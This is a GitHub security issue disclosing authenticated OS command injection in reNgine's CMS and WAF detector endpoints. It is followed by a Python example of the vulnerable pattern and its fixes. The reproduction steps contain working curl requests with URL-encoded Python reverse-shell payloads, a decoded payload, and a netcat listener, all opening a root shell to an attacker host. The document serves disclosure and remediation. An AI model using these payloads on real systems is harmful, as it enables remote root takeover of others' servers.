
security: OS Command Injection vulnerability (x2) #1219

@sa7mon


Is there an existing issue for this?

  • I have searched the existing issues

Current Behavior

Any authenticated user can run any OS command as the root user through an OS Command Injection vulnerability.

Expected Behavior

OS commands should not be allowed for arbitrary users.

Steps To Reproduce

  1. Bring up reNgine containers using docker compose

  2. Create another container on the same Docker network to act as the "attacker"

    $ docker run --rm -it --network=rengine_rengine_network kalilinux/kali-rolling bash
  3. Inside the Kali container, install netcat and start listening

    apt update && apt install -y netcat-traditional
    nc -vlp 9000
  4. Login to reNgine as any user - I will use an auditor role user. Copy the sessionid cookie.

    sessionid=3mlrtnjbgeoozwe4kek2jumhuak0m8rq
    
  5. From any HTTP client that can reach reNgine, make the following request, substituting the reNgine container's IP for RENGINE_IP and the Kali container's IP for 172.21.0.2.

    # The single quotes around the python3 -c argument are URL-encoded as %27
    # so they do not terminate the shell's single-quoted --url string
    curl --request GET \
      --url 'https://RENGINE_IP/api/tools/cms_detector/?format=json&url=https%3A%2F%2F127.0.0.1%20%26%26%20python3%20-c%20%27import%20socket,subprocess,os%3Bs%3Dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3Bs.connect((%22172.21.0.2%22,9000))%3Bos.dup2(s.fileno(),0)%3B%20os.dup2(s.fileno(),1)%3Bos.dup2(s.fileno(),2)%3Bimport%20pty%3B%20pty.spawn(%22sh%22)%27' \
      --header 'Cookie: sessionid=3mlrtnjbgeoozwe4kek2jumhuak0m7yq'

    The vulnerable parameter is url. If you send https://127.0.0.1 && COMMAND, the command will be executed by the root user. The command above is a URL-encoded version of this simple Python3 reverse shell payload:

    # attacker listener (the Kali container running nc -vlp 9000)
    export RHOST="172.21.0.2"
    export RPORT=9000
    python3 -c 'import sys,socket,os,pty
    s=socket.socket()
    s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
    # point stdin/stdout/stderr at the socket, then spawn an interactive sh on it
    [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
    pty.spawn("sh")'
  6. Check the Kali container for a new shell:

[Screenshot (2024-03-18): the reverse shell connecting back to the nc listener in the Kali container]

The same vulnerability is present in the WAF Detector:

curl --request GET \
  --url 'https://RENGINE_IP/api/tools/waf_detector/?url=https%3A%2F%2F127.0.0.1%20%26%26%20python3%2520-c%2520%2527import%2520socket%252Csubprocess%252Cos%253Bs%253Dsocket.socket%2528socket.AF_INET%252Csocket.SOCK_STREAM%2529%253Bs.connect%2528%2528%2522172.21.0.2%2522%252C9000%2529%2529%253Bos.dup2%2528s.fileno%2528%2529%252C0%2529%253B%2520os.dup2%2528s.fileno%2528%2529%252C1%2529%253Bos.dup2%2528s.fileno%2528%2529%252C2%2529%253Bimport%2520pty%253B%2520pty.spawn%2528%2522sh%2522%2529%2527&format=json' \
  --header 'Cookie: sessionid=3mlrtnjbgeoozwe4kek2jumhuak0m7yq'

Environment

- reNgine: master branch
- OS: MacOS
- Python: 
- Docker Engine: `Docker version 24.0.6, build ed223bc`
- Docker Compose: `Docker Compose version v2.21.0-desktop.1`
- Browser: Firefox

Anything else?

No response
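The two endpoints above behave as they do because a user-controlled URL ends up in a shell command line, where `&&` starts a second command. The snippet below is an added example, not reNgine's code (the issue does not show how reNgine builds the command); it reproduces the vulnerable pattern with a hypothetical `run_vulnerable` that passes a string to `subprocess.run(shell=True)`, then shows the two fixes a practitioner would want: passing the URL as a single argv element so no shell ever parses it, and rejecting URLs that contain shell metacharacters or an unexpected scheme before they reach any tool. The payload is a constructed benign one (`echo INJECTED`) standing in for the reverse shell.

```python
import subprocess
from urllib.parse import urlsplit

# Constructed attacker input with the same shape as the issue's payload:
# a valid-looking URL, a shell list operator, then a second command.
MALICIOUS_URL = "https://127.0.0.1 && echo INJECTED"
BENIGN_URL = "https://127.0.0.1"

# Characters that let a string escape a shell argument or smuggle a second
# command (list operators, pipes, substitution, redirection, whitespace).
SHELL_METACHARS = set(";&|`$<>(){}\\'\"\n\r\t ")


def run_vulnerable(url: str) -> str:
    """Hypothetical vulnerable pattern: the URL is interpolated into one
    command string and handed to /bin/sh, so '&&' is honoured."""
    # 'echo' stands in for the real detector binary
    result = subprocess.run(
        f"echo scanning {url}", shell=True, capture_output=True, text=True
    )
    return result.stdout


def run_argv_only(url: str) -> str:
    """Fix 1: no shell at all. The URL is one argv element, so the whole
    string (including '&& echo INJECTED') is just a literal argument."""
    result = subprocess.run(
        ["echo", "scanning", url], capture_output=True, text=True
    )
    return result.stdout


def validate_url(url: str) -> str:
    """Fix 2 (defence in depth): accept only http(s) URLs with a hostname
    and none of the characters a shell would interpret."""
    bad = SHELL_METACHARS.intersection(url)
    if bad:
        raise ValueError(f"disallowed characters in url: {sorted(bad)}")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"unsupported scheme: {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("url has no host")
    return url


def run_hardened(url: str) -> str:
    """Both fixes together: validate, then invoke without a shell."""
    return run_argv_only(validate_url(url))


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable(MALICIOUS_URL)))
    print("argv only: ", repr(run_argv_only(MALICIOUS_URL)))
    try:
        run_hardened(MALICIOUS_URL)
    except ValueError as exc:
        print("hardened:   rejected ->", exc)
    print("hardened:  ", repr(run_hardened(BENIGN_URL)))
```

Running `run_vulnerable` prints two lines because `sh` executed two commands; `run_argv_only` prints one line that happens to contain the literal text `&& echo INJECTED`, which is harmless. The validation step matters even with the argv form, since the detector binary itself may hand its argument to a shell, and it also closes off non-HTTP schemes that a network tool should never be asked to fetch.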

Labels: bug (Something isn't working)